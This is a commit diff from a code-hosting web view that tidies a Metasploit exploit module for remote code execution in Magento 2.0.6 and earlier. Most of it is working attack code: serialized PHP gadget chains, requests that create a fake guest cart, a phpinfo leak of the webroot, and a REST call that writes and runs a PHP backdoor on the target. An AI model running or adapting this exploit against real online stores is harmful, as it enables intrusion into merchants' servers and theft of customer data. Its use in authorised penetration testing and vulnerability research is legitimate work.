Cosmetic changes for magento_unserialize to pass msftidy & guidelines
parent
4f42cc8c08
commit
7c9227f70b
|
@ -13,16 +13,18 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
|
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
super(update_info(info,
|
super(update_info(info,
|
||||||
'Name' => 'Magento <= 2.0.6 Unserialize Remote Code Execution',
|
'Name' => 'Magento 2.0.6 Unserialize Remote Code Execution',
|
||||||
'Description' => %q{
|
'Description' => %q{
|
||||||
This module exploits a PHP object injection vulnerability in Magento <= 2.0.6
|
This module exploits a PHP object injection vulnerability in Magento 2.0.6
|
||||||
|
or prior.
|
||||||
},
|
},
|
||||||
'Platform' => 'php',
|
'Platform' => 'php',
|
||||||
'License' => MSF_LICENSE,
|
'License' => MSF_LICENSE,
|
||||||
'Author' => [
|
'Author' =>
|
||||||
|
[
|
||||||
'Netanel Rubin', # original discovery
|
'Netanel Rubin', # original discovery
|
||||||
'agix', # original exploit
|
'agix', # original exploit
|
||||||
'mr_me <mr_me@offensive-security.com>', # metasploit module
|
'mr_me <mr_me[at]offensive-security.com>', # metasploit module
|
||||||
],
|
],
|
||||||
'Payload' =>
|
'Payload' =>
|
||||||
{
|
{
|
||||||
|
@ -36,7 +38,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
['URL', 'http://blog.checkpoint.com/2015/11/05/check-point-discovers-critical-vbulletin-0-day/']
|
['URL', 'http://blog.checkpoint.com/2015/11/05/check-point-discovers-critical-vbulletin-0-day/']
|
||||||
],
|
],
|
||||||
'Arch' => ARCH_PHP,
|
'Arch' => ARCH_PHP,
|
||||||
'Targets' => [
|
'Targets' =>
|
||||||
|
[
|
||||||
[ 'Automatic Targeting', { 'auto' => true } ],
|
[ 'Automatic Targeting', { 'auto' => true } ],
|
||||||
],
|
],
|
||||||
'DisclosureDate' => 'May 17 2016',
|
'DisclosureDate' => 'May 17 2016',
|
||||||
|
@ -48,6 +51,10 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
], self.class)
|
], self.class)
|
||||||
end
|
end
|
||||||
|
|
||||||
|
def print_good(msg='')
|
||||||
|
super("#{peer} - #{msg}")
|
||||||
|
end
|
||||||
|
|
||||||
def get_phpinfo
|
def get_phpinfo
|
||||||
# uses the Magento_Framework_DB_Transaction class
|
# uses the Magento_Framework_DB_Transaction class
|
||||||
serialize = 'O:13:\"Credis_Client\":22:{'
|
serialize = 'O:13:\"Credis_Client\":22:{'
|
||||||
|
@ -149,7 +156,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
serialize << 's:18:\"\u0000*\u0000renamedCommands\";N;'
|
serialize << 's:18:\"\u0000*\u0000renamedCommands\";N;'
|
||||||
serialize << 's:11:\"\u0000*\u0000requests\";'
|
serialize << 's:11:\"\u0000*\u0000requests\";'
|
||||||
serialize << 'i:0;}'
|
serialize << 'i:0;}'
|
||||||
return serialize
|
|
||||||
|
serialize
|
||||||
end
|
end
|
||||||
|
|
||||||
def get_phpshell
|
def get_phpshell
|
||||||
|
@ -252,14 +260,16 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
serialize << 's:18:\"\u0000*\u0000renamedCommands\";N;'
|
serialize << 's:18:\"\u0000*\u0000renamedCommands\";N;'
|
||||||
serialize << 's:11:\"\u0000*\u0000requests\";'
|
serialize << 's:11:\"\u0000*\u0000requests\";'
|
||||||
serialize << 'i:0;}'
|
serialize << 'i:0;}'
|
||||||
return serialize
|
|
||||||
|
serialize
|
||||||
end
|
end
|
||||||
|
|
||||||
def do_check
|
def do_check
|
||||||
data = '{"paymentMethod":{"method":"checkmo","additional_data":{"additional_information":"'
|
data = '{"paymentMethod":{"method":"checkmo","additional_data":{"additional_information":"'
|
||||||
data << get_phpinfo
|
data << get_phpinfo
|
||||||
data << "\"}},\"email\":\"#{@email}\"}"
|
data << "\"}},\"email\":\"#{@email}\"}"
|
||||||
return send_request_cgi({
|
|
||||||
|
send_request_cgi({
|
||||||
'method' => 'POST',
|
'method' => 'POST',
|
||||||
'uri' => normalize_uri(target_uri.path, "/rest/V1/guest-carts/#{@guest_cart_id}/set-payment-information"),
|
'uri' => normalize_uri(target_uri.path, "/rest/V1/guest-carts/#{@guest_cart_id}/set-payment-information"),
|
||||||
'ctype' => 'application/json',
|
'ctype' => 'application/json',
|
||||||
|
@ -293,16 +303,19 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
rescue ::Rex::ConnectionError
|
rescue ::Rex::ConnectionError => e
|
||||||
|
vprint_error(e.message)
|
||||||
return Exploit::CheckCode::Safe
|
return Exploit::CheckCode::Safe
|
||||||
end
|
end
|
||||||
return Exploit::CheckCode::Safe
|
|
||||||
|
Exploit::CheckCode::Safe
|
||||||
end
|
end
|
||||||
|
|
||||||
def get_webroot
|
def get_webroot
|
||||||
data = '{"paymentMethod":{"method":"checkmo","additional_data":{"additional_information":"'
|
data = '{"paymentMethod":{"method":"checkmo","additional_data":{"additional_information":"'
|
||||||
data << get_phpinfo
|
data << get_phpinfo
|
||||||
data << "\"}},\"email\":\"#{@email}\"}"
|
data << "\"}},\"email\":\"#{@email}\"}"
|
||||||
|
|
||||||
# we steal path via phpinfo
|
# we steal path via phpinfo
|
||||||
res = send_request_cgi({
|
res = send_request_cgi({
|
||||||
'method' => 'POST',
|
'method' => 'POST',
|
||||||
|
@ -310,11 +323,13 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
'ctype' => 'application/json',
|
'ctype' => 'application/json',
|
||||||
'data' => data,
|
'data' => data,
|
||||||
})
|
})
|
||||||
if res and res.code == 200
|
|
||||||
|
if res && res.code == 200
|
||||||
@webroot = "#{$1}" if res.body =~ /_SERVER\["DOCUMENT_ROOT"\]<\/td><td class="v">(.*)<\/td><\/tr>/
|
@webroot = "#{$1}" if res.body =~ /_SERVER\["DOCUMENT_ROOT"\]<\/td><td class="v">(.*)<\/td><\/tr>/
|
||||||
return true
|
return true
|
||||||
end
|
end
|
||||||
return false
|
|
||||||
|
false
|
||||||
end
|
end
|
||||||
|
|
||||||
def create_fake_cart
|
def create_fake_cart
|
||||||
|
@ -325,10 +340,10 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
'cookie' => @cookies,
|
'cookie' => @cookies,
|
||||||
'vars_get' => { 'form_key' => @form_key }
|
'vars_get' => { 'form_key' => @form_key }
|
||||||
})
|
})
|
||||||
if (res and res.body.include?('[]'))
|
|
||||||
return true
|
return true if (res && res.body.include?('[]'))
|
||||||
end
|
|
||||||
return false
|
false
|
||||||
end
|
end
|
||||||
|
|
||||||
def generate_cart_id
|
def generate_cart_id
|
||||||
|
@ -337,27 +352,29 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
'uri' => normalize_uri(target_uri.path, '/checkout/cart/'),
|
'uri' => normalize_uri(target_uri.path, '/checkout/cart/'),
|
||||||
'cookie' => @cookies,
|
'cookie' => @cookies,
|
||||||
})
|
})
|
||||||
if res and res.code == 200
|
if res && res.code == 200
|
||||||
@guest_cart_id = "#{$1}" if res.body =~ /entity_id":"(.*)","store_id":\d,"created_at/
|
@guest_cart_id = "#{$1}" if res.body =~ /entity_id":"(.*)","store_id":\d,"created_at/
|
||||||
return true
|
return true
|
||||||
end
|
end
|
||||||
return false
|
|
||||||
|
false
|
||||||
end
|
end
|
||||||
|
|
||||||
def backdoor
|
def backdoor
|
||||||
data = "{\"paymentMethod\":{\"method\":\"checkmo\",\"additional_data\":{\"additional_information\":\""
|
data = "{\"paymentMethod\":{\"method\":\"checkmo\",\"additional_data\":{\"additional_information\":\""
|
||||||
data << get_phpshell
|
data << get_phpshell
|
||||||
data << "\"}},\"email\":\"#{@email}\"}"
|
data << "\"}},\"email\":\"#{@email}\"}"
|
||||||
|
|
||||||
res = send_request_cgi({
|
res = send_request_cgi({
|
||||||
'method' => 'POST',
|
'method' => 'POST',
|
||||||
'uri' => normalize_uri(target_uri.path, "/rest/V1/guest-carts/#{@guest_cart_id}/set-payment-information"),
|
'uri' => normalize_uri(target_uri.path, "/rest/V1/guest-carts/#{@guest_cart_id}/set-payment-information"),
|
||||||
'ctype' => 'application/json',
|
'ctype' => 'application/json',
|
||||||
'data' => data,
|
'data' => data,
|
||||||
})
|
})
|
||||||
if (res && res.body.include?('true'))
|
|
||||||
return true
|
return true if (res && res.body.include?('true'))
|
||||||
end
|
|
||||||
return false
|
false
|
||||||
end
|
end
|
||||||
|
|
||||||
def exec_code
|
def exec_code
|
||||||
|
@ -366,21 +383,22 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
'uri' => normalize_uri(target_uri.path, "/#{@backdoor}"),
|
'uri' => normalize_uri(target_uri.path, "/#{@backdoor}"),
|
||||||
}, timeout = 0.5)
|
}, timeout = 0.5)
|
||||||
end
|
end
|
||||||
|
|
||||||
def exploit
|
def exploit
|
||||||
define_globals
|
define_globals
|
||||||
@backdoor = "#{Rex::Text.rand_text_alphanumeric(26)}.php"
|
@backdoor = "#{Rex::Text.rand_text_alphanumeric(26)}.php"
|
||||||
register_files_for_cleanup("#{@backdoor}")
|
register_files_for_cleanup("#{@backdoor}")
|
||||||
if create_fake_cart && generate_cart_id
|
if create_fake_cart && generate_cart_id
|
||||||
print_good("generated a guest cart id")
|
print_good("generated a guest cart id")
|
||||||
if get_webroot
|
if get_webroot && backdoor
|
||||||
if backdoor
|
|
||||||
print_good("backdoor done!")
|
print_good("backdoor done!")
|
||||||
exec_code
|
exec_code
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
end
|
|
||||||
end
|
end
|
||||||
|
|
||||||
=begin
|
=begin
|
||||||
saturn:metasploit-framework mr_me$ ./msfconsole -qr scripts/sam.rc
|
saturn:metasploit-framework mr_me$ ./msfconsole -qr scripts/sam.rc
|
||||||
[*] Processing scripts/sam.rc for ERB directives.
|
[*] Processing scripts/sam.rc for ERB directives.
|
||||||
|
|
Loading…
Reference in New Issue